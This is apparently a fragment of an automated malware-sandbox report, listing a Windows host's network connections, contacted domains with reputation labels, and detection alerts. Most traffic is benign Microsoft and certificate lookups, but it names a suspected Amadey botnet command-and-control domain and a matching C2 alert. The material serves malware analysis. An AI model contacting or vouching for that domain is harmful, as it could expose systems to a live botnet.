1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6808 | SIHClient.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3416 | svchost.exe | 184.24.77.37:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
3416 | svchost.exe | 69.192.161.161:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5064 | SearchApp.exe | 92.123.104.17:443 | www.bing.com | Akamai International B.V. | DE | whitelisted |
5064 | SearchApp.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1176 | svchost.exe | 40.126.32.136:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1176 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
google.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
login.live.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
berb.fitnessclub-filmfanatics.com |
| unknown |
c.pki.goog |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
— | — | Not Suspicious Traffic | INFO [ANY.RUN] Online Pastebin Text Storage |
— | — | Malware Command and Control Activity Detected | BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s) |